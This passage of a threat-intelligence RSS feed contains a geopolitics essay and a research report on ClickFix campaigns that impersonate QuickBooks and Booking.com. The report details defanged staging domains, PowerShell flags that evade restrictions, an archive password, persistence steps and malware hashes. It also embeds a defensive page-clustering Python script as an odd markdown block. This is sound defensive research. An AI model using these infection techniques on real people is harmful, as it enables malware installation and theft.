        <p>With daily monitoring of Magecart-infected sites and enriched merchant data that integrates with transaction monitoring, Payment Fraud Intelligence can enable detection of high-risk merchants months before stolen card data appears for sale.<br /><br />Additionally, the Scam Merchants dataset can identify fraudulent merchant accounts and their associated domains before customers are defrauded and before downstream card data reaches criminal markets.</p>
        <p>Tester merchant monitoring surfaces card testing activity as an early signal of which portfolios are being targeted ahead of any monetization attempt.</p>
        <p>Because Payment Fraud Intelligence monitors the sources, kits, and infrastructure that threat actors have increasingly standardized around, a single identified indicator can surface exposure across a portfolio at scale.<br /><br />According to Recorded Future data, 75% of compromised cards are identified before fraud occurs, and 90% of compromised card assets are identified within hours of a breach.</p>
        <p>The pre-monetization window will not narrow as the fraud ecosystem matures — if anything, the report's data suggests it will widen as standardization deepens. Financial institutions with visibility into that window can act before losses occur. Those without it will continue to respond after the fact.</p>
        <p>Read <em>the full</em> <a href="https://go.recordedfuture.com/Payment_Fraud_Intelligence_Report_2025.html">Annual Payment Fraud Intelligence Report: 2025</a> to explore this year's findings in depth.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_153cda5c0105b1bf45066ca44c92e63fe63172790.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Shift: An Era of Quantum Geopolitics]]></title>
            <link>https://www.recordedfuture.com/ko/blog/the-shift-an-era-of-quantum-geopolitics</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/the-shift-an-era-of-quantum-geopolitics</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[The expanding conflict around Iran signals a deeper shift. We have entered an era of quantum geopolitics, where the old rules of the international order no longer apply]]></description>
            <content:encoded><![CDATA[
        <p>The expanding conflict around Iran signals a deeper shift. We have entered an era of <strong>quantum geopolitics</strong>, where the old rules of the international order no longer apply. What began as a regional confrontation is already reshaping global markets, supply chains, and corporate security planning. Leaders must adapt how they think, spend, and communicate in a system where uncertainty is not a risk to manage—it is the operating environment itself.</p>
        <h2><strong>What is Quantum Geopolitics?</strong></h2>
        <p>A useful analogy comes from physics.<br /><br />Classical systems produce predictable outcomes. Quantum systems behave probabilistically, where interactions in one place can produce distant effects.</p>
        <p>International politics increasingly resembles the latter.<br /><br />The assumptions that shaped corporate strategy for decades—durable alliances, expanding globalization, and broadly coherent regulation—are weakening. Geopolitical shocks now move rapidly through tightly interconnected systems.</p>
        <p>Four dynamics define how this system now behaves.</p>
        <p>🌓 <strong>Superposition: Friends, Rivals, and Everything in Between</strong></p>
        <p>Countries can no longer be neatly categorised as “ally” or “adversary.” They exist in overlapping states, with true alignment revealed only in moments of crisis.</p>
        <p>States balance security partnerships with the West while maintaining economic ties with rivals. Turkey <a href="https://carnegieendowment.org/europe/strategic-europe/2025/11/turkey-stakes-its-claim-in-the-ukraine-peace-process">supports</a> Ukraine diplomatically while <a href="https://turkishminute.com/2025/09/09/turkey-has-become-russias-second-largest-trading-partner-minister-says/">sustaining</a> trade flows that benefit Russia. India <a href="https://www.whitehouse.gov/briefings-statements/2025/02/united-states-india-joint-leaders-statement/">deepens</a> defence ties with the United States even as it increases purchases of Russian oil.</p>
        <p>Public statements offer limited guidance. Trade flows, enforcement patterns, and technology controls are more reliable indicators of intent.</p>
        <p>For multinational firms, geopolitical positioning is no longer fixed. It is fluid.</p>
        <p>🌀 <strong>The End of Guarantees: Promises Now Come with Caveats</strong></p>
        <p>Security commitments, trade access, and regulatory stability have shifted from certainties to probabilities.</p>
        <p>Export controls can reroute supply chains within months. Sanctions regimes expand or unwind quickly. Even long-standing alliances depend on political will at the moment they are tested.</p>
        <p>For businesses, this means long-term investments now carry elevated policy risk.</p>
        <p>Leaders must plan for variance.</p>
        <p>🧬 <strong>Quantum Entanglement: Local Conflicts Are Not Local</strong></p>
        <p>Global systems—financial, technological, logistical—are tightly coupled. Regional conflicts now generate immediate global effects.</p>
        <p>Threats to Gulf commercial hubs <a href="https://www.thebanker.com/content/c0847003-aa2d-4c4a-92ae-e8714a5f6bb2">disrupt</a> international banking. Instability in the Strait of Hormuz <a href="https://www.orfonline.org/english/expert-speak/the-global-costs-of-instability-in-the-strait-of-hormuz">drives</a> energy price volatility and <a href="https://www.insurancejournal.com/news/international/2026/03/17/862173.htm">strains</a> global shipping insurance. Cyber <a href="https://www.recordedfuture.com/ko/blog/the-iran-war-what-you-need-to-know">campaigns</a> tied to the conflict target companies far beyond the region.</p>
        <p>Disruption is rarely contained. Risk can no longer be managed by geography or function alone.</p>
        <p>🔬 <strong>The Observer Effect: Whoever Sets the Rules First Wins</strong></p>
        <p>Influence increasingly derives from shaping rules rather than operating within them.</p>
        <p>States that move early to establish standards in artificial intelligence, semiconductors, digital infrastructure, and financial regulation compel others to adapt.</p>
        <p>Waiting for clarity can therefore be a strategic liability in itself.<br />If you do not shape the agenda, you become subject to it.</p>
        <h2><strong>Why This Moment Feels Different</strong></h2>
        <p>These dynamics are most visible in cyberspace, where geopolitical competition unfolds continuously below the threshold of open conflict.</p>
        <p>State-sponsored actors operate inside corporate networks without triggering overt confrontation. Criminal groups, proxies, and intelligence services overlap, complicating attribution and response.</p>
        <p>The boundary between geopolitical conflict and corporate exposure is now thin. A single breach can trigger regulatory scrutiny, customer loss, market volatility, and diplomatic tension at once.</p>
        <p>Cybersecurity is no longer a technical function. It is a core enterprise risk.</p>
        <h2><strong>How Security Leaders Should Respond</strong></h2>
        <p>In a system governed by probabilities rather than predictability, security leaders must adapt how they think, allocate resources, and position their organizations.</p>
        <p>1. <strong>Mindset Shift: Scenarios, Not Forecasts</strong></p>
        <p>Replace long planning horizons and static risk assessments with continuous scenario planning. Tools such as the <a href="https://prescient2050.com/the-cone-of-plausibility-can-assist-your-strategic-planning-process/">Cone of Plausibility</a> can stress-test responses to sanctions escalation, maritime disruption, regulatory fragmentation, or supply chain shocks.<br /><br />Evaluate decision speed, cross-functional coordination, and response thresholds under pressure.<br />Adaptability matters more than accuracy.</p>
        <p>2. <strong>Spending Shift: Invest in Resilience, Not Just Efficiency</strong></p>
        <p>Systems optimized solely for efficiency often lack resilience.</p>
        <p>Diversifying suppliers, strengthening sanctions compliance, improving cybersecurity, and increasing visibility into third-party exposure can reduce vulnerability to geopolitical shocks.</p>
        <p>Resilience is not a defensive expense; it is operational insurance.</p>
        <p>3. <strong>Communication Shift: From Reporting to Action</strong></p>
        <p>Security leaders must translate geopolitical developments into clear decision frameworks before crises materialize.</p>
        <p>This requires close coordination across legal, finance, and operations, as well as proactive engagement with regulators and industry partners.</p>
        <p>Speed and clarity determine whether the organization shapes outcomes or reacts to them.</p>
        <h2><strong>Final Thoughts</strong></h2>
        <p>The Iran conflict offers a preview of what comes next. Alliances are conditional. Economic pressure, cyber activity, and regulatory responses unfold simultaneously.</p>
        <p>Quantum geopolitics does not eliminate strategy. It demands a different kind—one built on scenario readiness, structural resilience, and faster decision cycles.</p>
        <p>Leaders who wait for clarity will move too late.</p>
        <p>Those who organize for uncertainty will operate ahead of it.</p>
        <p><strong>To access the latest Insikt Group® research</strong> <a href="https://www.recordedfuture.com/ko/research/insikt-group">click here</a>.</p>
        <p><em><a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group®</a> helps Recorded Future secure our world with threat intelligence. With deep experience in government, law enforcement, military, and intelligence agencies, we power the Recorded Future Platform with analyst-validated data and analytics, along with cyber and geopolitical intelligence. This enables our customers to reduce risk and prevent disruption.</em></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_100c2720c5cfd6aa24faaccb21a0f62fb9d70448e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[ClickFix Campaigns Targeting Windows and macOS]]></title>
            <link>https://www.recordedfuture.com/ko/research/clickfix-campaigns-targeting-windows-and-macos</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/clickfix-campaigns-targeting-windows-and-macos</guid>
            <pubDate>Wed, 25 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group reveals five ClickFix social engineering clusters (QuickBooks, Booking.com, Birdeye) targeting Windows and macOS. Learn how threat actors exploit native system tools with malicious, obfuscated commands to gain initial access, and get key mitigations for defense.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group identified five distinct clusters leveraging the ClickFix social engineering technique to facilitate initial access to host systems. Observed since at least May 2024, these clusters include those impersonating the financial application Intuit QuickBooks and the travel agency Booking.com. Insikt Group leveraged the Recorded Future® HTML Content Analysis dataset, which enables systematic monitoring of embedded web artifacts to identify and track new malicious domains and infrastructure.</p>
        <p>The clusters show significant operational variance in lure themes and infrastructure patterns, and they highlight the technique's evolution: it has moved past simple verification prompts to visually fooling victims with a variety of fake challenges, and it demonstrates technical sophistication through operating system detection that tailors the execution chain. Despite these structural differences, the technique operates in largely the same way across clusters, showing that ClickFix’s core techniques work across platforms and that only the social engineering lure needs to be adapted to the victim. Threat actors manipulate victims into executing malicious, obfuscated commands directly within native system tools like the Windows Run dialog box or macOS Terminal.</p>
        <p>This living-off-the-land (LotL) approach allows malicious scripts to execute in memory, effectively bypassing traditional browser security and endpoint controls. Parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicate that ClickFix has transitioned into a standardized, high-ROI template for both cybercriminal and potentially advanced persistent threat (APT) groups.</p>
        <p>To protect against these threats, security defenders should move beyond simple indicator blocking and prioritize aggressive behavioral hardening. Key recommendations include disabling the Windows Run dialog box via Group Policy Objects (GPO), implementing PowerShell Constrained Language Mode (CLM), and operationalizing Digital Risk Prevention tools such as Recorded Future's Malicious Websites to identify and mitigate threats to your digital assets.</p>
        <p>Based on increasing use since 2024, Insikt Group assesses that the ClickFix methodology will very likely remain a primary initial access vector throughout 2026 as threat actors continue to social engineer victims to enable exploitation. Looking ahead, Insikt Group anticipates ClickFix lures will become increasingly technically adaptive, incorporating more selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims into executing malicious commands.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group identified and tracked five distinct ClickFix activity clusters exhibiting significant operational variance in lure themes and infrastructure patterns despite a shared reliance on fraudulent human-verification lures. This indicates that the ClickFix methodology has transitioned into a standardized, high-ROI template adopted across a fragmented ecosystem of threat actors.</li>
          <li>While visually diverse, all analyzed clusters use a consistent execution framework that bypasses traditional browser security controls by shifting the point of exploitation to user-assisted manual commands. These campaigns target a wide variety of sectors, including accounting (QuickBooks), travel (Booking.com), and system optimization (macOS).</li>
          <li>ClickFix technical execution follows a standardized four-stage pattern: input of highly encoded or fragmented strings, native execution via legitimate system shells and living-off-the-land binaries (LOLBins), remote ingress from threat actor-controlled infrastructure, and immediate in-memory execution. This methodology allows threat actors to stage and run remote code while leaving only limited and short-lived forensic artifacts on the host system.</li>
        </ul>
        <h2>Background</h2>
        <p>First <a href="https://www.todyl.com/blog/clickfix-evolution-copy-paste-social-engineering">documented</a> in late 2023, ClickFix has transitioned from a niche social engineering tactic to a cornerstone of the global cybercriminal ecosystem. ClickFix is a social engineering methodology that <a href="https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/">lures</a> victims into manually executing malicious commands by masquerading as a <a href="https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic">necessary technical</a> resolution for fabricated system errors or human-verification prompts. This technique represents an evolutionary shift from the FakeUpdates (SocGholish) <a href="https://www.proofpoint.com/uk/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update">model</a>, prioritizing manual user intervention to <a href="https://www.bitdefender.com/en-gb/blog/businessinsights/how-clickfix-cyberattack-technique-works?srsltid=AfmBOorcXXl_4BqrPLnwcNkY6CwC40PfEMhP6qzfszoh65C9Ko4teVBE">evade</a> the increasingly robust security features of modern web browsers and automated endpoint detection systems. In this context, the methodology embodies a "think smart, not hard" approach. The simplicity of relying on a manual user action makes it a potent defensive evasion tactic: bypassing typical browser-based security makes it difficult to detect, while the high number of threat actors using it makes it difficult to track across a fragmented threat landscape.</p>
        <p>The technical core of the methodology relies primarily on pastejacking, where background JavaScript <a href="https://www.truesec.com/hub/blog/threat-actors-paste-jacking-remote-code-execution">populates</a> a victim's clipboard with an obfuscated command while they are <a href="https://www.bleepingcomputer.com/news/security/inside-a-real-clickfix-attack-how-this-social-engineering-hack-unfolds/">distracted</a> by visual lures such as fraudulent reCAPTCHA or Cloudflare Turnstile overlays. In some instances, the malicious command is not placed on the victim’s clipboard automatically; instead, victims are manipulated into copying and running it manually. By leveraging a living-off-the-land (LotL) approach, threat actors manipulate users into <a href="https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/">executing</a> these commands directly within trusted system tools like the Windows Run dialog box, PowerShell, or the macOS Terminal. This user-assisted execution <a href="https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/">allows</a> malicious scripts to execute silently and bypass traditional browser and endpoint security perimeters.</p>
        <p>ClickFix has been weaponized by a diverse spectrum of threat actors, ranging from high-volume initial access brokers (IABs) to <a href="https://www.securityweek.com/clickfix-widely-adopted-by-cybercriminals-apt-groups/#:~:text=All%20variations%20work%20in%20a,distribution%20of%20the%20XWorm%20RAT.">sophisticated state-sponsored</a> groups such as BlueDelta (aka <a href="https://cert.gov.ua/article/6281123">APT28</a>) and the <a href="https://www.infosecurity-magazine.com/news/clickfake-interview-campaign/">North Korean</a> group PurpleBravo. The <a href="https://socradar.io/blog/clickfix-filefix-copy-paste-top-social-engineering/">methodology</a> enables a repeatable and scalable delivery framework capable of deploying a wide variety of secondary payloads, including infostealers like Lumma Stealer and Vidar, or remote access trojans (RATs) such as NetSupport RAT and Odyssey Stealer. These <a href="https://netlas.io/blog/fake_prompts/">operations</a> are frequently supported by highly adaptive, disposable infrastructure designed to maintain operational continuity even as individual domains are identified and blocked.</p>
        <h2>Technical Analysis</h2>
        <p>Insikt Group identified and tracked five emerging ClickFix clusters by leveraging the Recorded Future HTML Content Analysis dataset, which enables the systematic monitoring of embedded web artifacts. By pivoting on unique technical identifiers, including specific Document Object Model (DOM) hashes, hard-coded image source tags, and unique page titles, Insikt Group mapped ClickFix’s infrastructure and identified new malicious domains and infrastructure, facilitating the discovery of active domains and near real-time monitoring of cluster evolution.</p>
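        <p>The pivots named above (a DOM hash, hard-coded image source tags, and a unique page title) can be reproduced with a few lines of code. The following Python sketch is an added example written for this page; it is not Recorded Future's HTML Content Analysis tooling and makes no claim about how that dataset computes its hashes. It hashes a structural skeleton of each page (tag names and attribute names only, so swapping the hosted domain or the visible text does not change the hash) and links pages that also share a title or an image source. The sample pages, the <em>example.invalid</em> hostnames and the <em>cdn.example.invalid</em> image URL are constructed for the demonstration, not indicators from the report.</p>

```python
import hashlib
from html.parser import HTMLParser


class PageFingerprinter(HTMLParser):
    """Collect three pivot features from one captured lure page: the <title>
    text, every hard-coded <img src>, and a structural skeleton of the DOM
    (tag names plus attribute *names*, without values or text) to be hashed."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.img_sources = []
        self._skeleton = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        attr_names = ",".join(sorted(name for name, _ in attrs))
        self._skeleton.append(f"<{tag}:{attr_names}>")
        if tag == "title":
            self._in_title = True
        elif tag == "img":
            self.img_sources.extend(v for k, v in attrs if k == "src" and v)

    def handle_endtag(self, tag):
        self._skeleton.append(f"</{tag}>")
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data.strip()

    def dom_hash(self):
        return hashlib.sha256("".join(self._skeleton).encode()).hexdigest()


def fingerprint(html):
    """Return the pivot features for one page as a plain dict."""
    parser = PageFingerprinter()
    parser.feed(html)
    parser.close()
    return {
        "title": parser.title,
        "dom_hash": parser.dom_hash(),
        "img_sources": tuple(parser.img_sources),
    }


def same_cluster(fp_a, fp_b):
    """Link two pages when the DOM skeleton matches AND they share the page
    title or at least one hard-coded image source. Requiring a second feature
    keeps generic page templates from collapsing into a single cluster."""
    if fp_a["dom_hash"] != fp_b["dom_hash"]:
        return False
    shared_img = set(fp_a["img_sources"]) & set(fp_b["img_sources"])
    return fp_a["title"] == fp_b["title"] or bool(shared_img)


def cluster_pages(pages):
    """Greedy single-linkage grouping of {name: html}; returns lists of names."""
    clusters = []
    for name, html in pages.items():
        fp = fingerprint(html)
        for members in clusters:
            if same_cluster(fp, members[0][1]):
                members.append((name, fp))
                break
        else:
            clusters.append([(name, fp)])
    return [[name for name, _ in members] for members in clusters]


# Constructed sample captures (hypothetical .invalid hosts, not report IoCs).
LURE_TEMPLATE = (
    '<!DOCTYPE html><html><head><meta charset="utf-8">'
    "<title>{title}</title></head>"
    '<body><div class="box"><img src="{img}" alt="">'
    "<p>Complete the check to continue to {host}</p>"
    '<button id="verify-btn">Continue</button></div>'
    '<script src="/static/verify.js"></script></body></html>'
)
LOGO = "https://cdn.example.invalid/logo-3f1a.png"
PAGE_A = LURE_TEMPLATE.format(title="Verify you are human", img=LOGO, host="portal-one.example.invalid")
PAGE_B = LURE_TEMPLATE.format(title="Verify you are human", img=LOGO, host="portal-two.example.invalid")
# Same skeleton as A/B but no shared title or image: structurally similar, not linked.
PAGE_D = LURE_TEMPLATE.format(title="Update required", img="https://cdn.example.invalid/other.png", host="x.example.invalid")
PAGE_C = ("<!DOCTYPE html><html><head><title>Welcome</title></head>"
          "<body><h1>Welcome</h1><p>Nothing to see here.</p></body></html>")

if __name__ == "__main__":
    print(cluster_pages({"a": PAGE_A, "b": PAGE_B, "c": PAGE_C, "d": PAGE_D}))
```

The skeleton deliberately ignores attribute values, so a lure re-hosted on a fresh domain still hashes identically; the title or image check is what turns a structural match into a cluster membership.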
        <p>Across the analyzed clusters, Insikt Group detailed the ClickFix commands victims were manipulated into executing on their systems. These commands relied heavily on LOLBins to achieve operational goals. By using LOLBins, threat actors leveraged native, legitimately signed executables to download malicious payloads to a victim's machine. Depending on the security controls in place on personal machines or corporate endpoints, this methodology can effectively evade standard detections and sidestep foundational security principles.</p>
        <h2>ClickFix Clusters</h2>
        <p>Insikt Group identified five clusters (see Figure 1) that exhibited significant operational variance despite a shared reliance on the ClickFix social engineering technique. These clusters were defined by their infrastructure patterns and targeting approaches, ranging from logistics-themed lures to dual-platform selection logic. This indicates that the ClickFix methodology is being deployed across a fragmented ecosystem of threat actors, each tailoring the technique to suit their own delivery requirements and victim profiles.</p>
        <p>These clusters were grouped based on observable patterns in infrastructure reuse, lure formatting, platform targeting, and operational adjustments over time. While core technical elements and delivery mechanisms overlap, each cluster maintained a distinct footprint within the broader landscape. Insikt Group categorized the activity into the following five clusters:</p>
        <ul>
          <li><strong>Intuit QuickBooks:</strong> Targeted impersonation of accounting software, often leveraging aged domains to bypass security filters</li>
          <li><strong>Booking.com:</strong> Used fraudulent domains to present fake verification portals</li>
          <li><strong>Birdeye:</strong> A large-scale cluster that lures users of the AI marketing company Birdeye by spoofing its domains and manipulating victims into running a malicious command that delivers NetSupport RAT</li>
          <li><strong>Dual-Platform Selection:</strong> Used operating system detection to deliver platform-tailored lures and malware</li>
          <li><strong>macOS Storage Cleaning:</strong> Used counterfeit prompts mimicking macOS system optimization to trick users into executing encoded terminal commands</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_150aa308107dfdb116e75074b6d2fe2a56e876ba8.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1129" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1</strong>: Overview of ClickFix and associated clusters (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Cluster 1: Intuit QuickBooks</h2>
        <p>Cluster 1 was observed operating from January 2026 to the time of writing, primarily targeting organizations through social engineering lures impersonating the accounting software Intuit QuickBooks. QuickBooks is widely used for tax preparation in the United States; given that the campaign's active window coincides with the US tax season (typically January through April 15), Insikt Group assesses with moderate confidence that the timing was a calculated effort to target entities engaged in financial reporting. Although this cluster recently pivoted to targeting users of the US real estate marketplace Zillow, QuickBooks-related artifacts and brand-specific imagery remain deeply embedded throughout the Document Object Model (DOM) of the malicious landing pages.</p>
        <h3>Cluster 1 Profile</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1afae411ae78063da81d0b8523c7a456001ecf471.png?width=750&amp;format=png&amp;optimize=medium" width="1522" height="1162" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2</strong>: Overview of ClickFix Cluster 1 — Intuit QuickBooks (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_16f899c13b76a95cab5142d9de36b9e832cf66f63.png?width=750&amp;format=png&amp;optimize=medium" width="1522" height="758" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 1:</strong></em> <em>PowerShell commands observed across Cluster 1</em></div>
          </div>
        </div>
        <h3>Cluster 1 Infection Chain</h3>
        <p>The infection chain begins when a victim lands on a ClickFix landing page. The page presents a fraudulent human-verification interface (see <strong>Figure 3</strong>) that instructs the victim to complete specific "verification" steps.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1953657b4363956e75250f0c155e1224d5e030c22.png?width=750&amp;format=png&amp;optimize=medium" width="1351" height="878" />
            </div>
          </div>
          <div>
            <div><strong>Figure 3</strong>: Intuit QuickBooks-themed ClickFix page (Source: Recorded Future Web Scans)</div>
          </div>
        </div>
        <p>By interacting with the page, the victim unknowingly copies a malicious command to their system clipboard. The technique often results in execution through native system utilities, such as the Windows Run dialog and PowerShell, leveraging LOLBins to evade traditional browser and endpoint-based security controls.</p>
        <p>Upon pasting the command, an obfuscated PowerShell script (Figure 4) executes in a hidden window. This stager uses self-referential function names to dynamically construct and invoke an <code>Invoke-RestMethod</code> call to the domain <em>nobovcs[.]com</em>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15ac4061a037d6d798b97174406beabefc69fc35d.png?width=750&amp;format=png&amp;optimize=medium" width="1508" height="292" />
            </div>
          </div>
          <div>
            <div><strong>Figure 4</strong>: Obfuscated PowerShell command executed in a hidden window, dynamically reconstructing and invoking code via iex (Source: Recorded Future)</div>
          </div>
        </div>
        <p>This request triggers the retrieval of a short PowerShell stager (see <strong>Figure 5</strong>) that downloads a second-stage payload, <code>bibi.php</code>, saving it to the <code>%TEMP%</code> directory as <code>script.ps1</code>. This stager is the initial execution step that kicks off the NetSupport RAT installation.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dfacfa2916f08dad6926c4489f4289563aee07c2.png?width=750&amp;format=png&amp;optimize=medium" width="1508" height="626" />
            </div>
          </div>
          <div>
            <div><strong>Figure 5:</strong> Stager script to download second-stage script, bibi.php (Source: Recorded Future)</div>
          </div>
        </div>
        <p>The <code>bibi.php</code> script is essential for the final deployment phase and for obfuscating on-disk artifacts. It contains a function called <code>Get-RomanticName</code>, which selects and combines strings from a thematic wordlist, including terms such as "Heart", "Soul", and "Desire", to generate a randomized folder name under <code>%LOCALAPPDATA%</code>, where the staging files are placed.</p>
        <p>The script retrieves four primary files from <em>nobovcs[.]com</em>, detailed in <strong>Table 2</strong>.</p>
        <table>
          <thead>
            <tr>
              <th>Filename</th>
              <th>SHA-256</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>at.7z</td>
              <td>c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50</td>
            </tr>
            <tr>
              <td>lnk.7z</td>
              <td>5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db</td>
            </tr>
            <tr>
              <td>7z.exe</td>
              <td>43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87</td>
            </tr>
            <tr>
              <td>7z.dll</td>
              <td>b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</td>
            </tr>
          </tbody>
        </table>
        <p><em><strong>Table 2:</strong></em> <em>Filenames and SHA256 hashes of the files downloaded from</em> nobovcs[.]com <em>(Source: Recorded Future)</em></p>
        <p>The script uses <code>7z.exe</code> to extract <code>at.7z</code> (protected by the password “pppp”), which contains the NetSupport RAT binary, <code>neservice.exe</code>. Persistence is established by hijacking Startup shortcuts; if no existing shortcut is detected, the script extracts <code>lnk.7z</code> to the Startup folder to ensure the payload launches automatically upon system reboot.</p>
        <p>Following successful execution, the binary <code>neservice.exe</code> performs an HTTP GET request to <em>gologpoint[.]com</em> to initiate command-and-control (C2) communications. <em>gologpoint[.]com</em> resolves to the IP address <em>62[.]164[.]177[.]230</em>.</p>
        <h2>Cluster 2: Booking.com</h2>
        <p>Cluster 2 was observed operating from February 2026 to the time of writing, impersonating the travel agency Booking.com. Insikt Group tracked the cluster by pivoting on a unique DOM hash made possible by the threat actor’s repeated use of a unique HTML title and consistent image files. Indicators of compromise (IoCs) tagged in this cluster can be seen in the Recorded Future HTML Content Analysis. The landing pages for this cluster use a counterfeit reCAPTCHA v2 challenge, requiring victims to select all photos containing a "bucket" (<strong>Figure 6</strong>). Insikt Group observed that the same challenge photos are presented in the same order across all analyzed pages.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_188f4bdaf603c790d3c24ab3fb11342099dff27c7.png?width=750&amp;format=png&amp;optimize=medium" width="1298" height="728" />
        </p>
        <h3>Cluster 2 Profile</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15fb5ca7c219bf306c0b154c98992ceec8bb83113.png?width=750&amp;format=png&amp;optimize=medium" width="1508" height="954" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7</strong>: Overview of ClickFix Cluster 2 — Booking.com (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_113c8926c6e60fa47227578a7bdacee4e10079a96.png?width=750&amp;format=png&amp;optimize=medium" width="1458" height="246" />
            </div>
          </div>
          <div>
            <div><em><strong>Table 3:</strong></em> <em>PowerShell commands observed across Cluster 2</em></div>
          </div>
        </div>
        <h3>Cluster 2 Infection Chain</h3>
        <p>The process begins when a victim interacts with the fake challenge. Upon completing the challenge, the victim is redirected to a verification page where a malicious PowerShell command (see <strong>Figure 8</strong>) is copied to the system clipboard. Instructions on the verification page manipulate the victim into opening the Windows Run dialog box and entering the command. Executing this malicious command starts the infection chain for NetSupport RAT.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_142f6e6aeed187e29123ff2cddd49f883ba4586be.png?width=750&amp;format=png&amp;optimize=medium" width="1494" height="322" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 8:</strong></em> <em>Command from the booking campaign that reaches out to the payload server (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>The PowerShell command provided in <code>script.ps1</code> (see <strong>Figure 9</strong>) executes with the <code>-NoProfile</code> and <code>-ExecutionPolicy Bypass</code> flags to evade standard logging and security restrictions. Following execution, the system pulls four staging files to a directory named <code>DesireSpark Serenade</code>. This directory naming convention is functionally identical to the "romantic" naming methodology observed in Cluster 1.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1466ddd2b2d192abf84da2039c64f98b9ca8c3d15.png?width=750&amp;format=png&amp;optimize=medium" width="1510" height="770" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 9</strong>: DOM file from</em> checkpulse[.]com <em>that details the command to be run on the victim machine, suppressing the protections normally in place to pull down the PowerShell command and execute it (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>The primary staging mechanism relies on <code>script.ps1</code> to pull secondary payloads from the staging server. In one analyzed instance, scripts originating from <em>thestayreserve[.]com</em> reached out to <em>checkpulses[.]com</em> to retrieve the files detailed in <strong>Table 4</strong>.</p>
        <table>
          <thead>
            <tr>
              <th>Filename</th>
              <th>SHA-256</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>at.7z</td>
              <td>397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8</td>
            </tr>
            <tr>
              <td>lnk.7z</td>
              <td>5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db</td>
            </tr>
            <tr>
              <td>7z.exe</td>
              <td>43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87</td>
            </tr>
            <tr>
              <td>7z.dll</td>
              <td>b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c</td>
            </tr>
          </tbody>
        </table>
        <p><em><strong>Table 4:</strong></em> <em>Filenames and SHA256 hashes of the files downloaded from</em> checkpulses[.]com <em>(Source: Recorded Future)</em></p>
        <p>The <code>7z.exe</code> utility is used to extract <code>at.7z</code>, which contains the NetSupport RAT binary <code>neservice.exe</code>. Persistence is established by adding a link to the system Startup folder.</p>
        <p>The domains observed across this cluster use a similar PowerShell command pattern; however, once the command is executed, the infection chain varies slightly in the staging infrastructure that is called. In the cases of the <em>sign-in-op-token[.]com</em> and <em>thestayreserve[.]com</em> domains, the malicious command is identical in pattern and organization, but the hard-coded dropper domain is <em>bkng-updt[.]com</em> and <em>checkpulses[.]com</em>, respectively.</p>
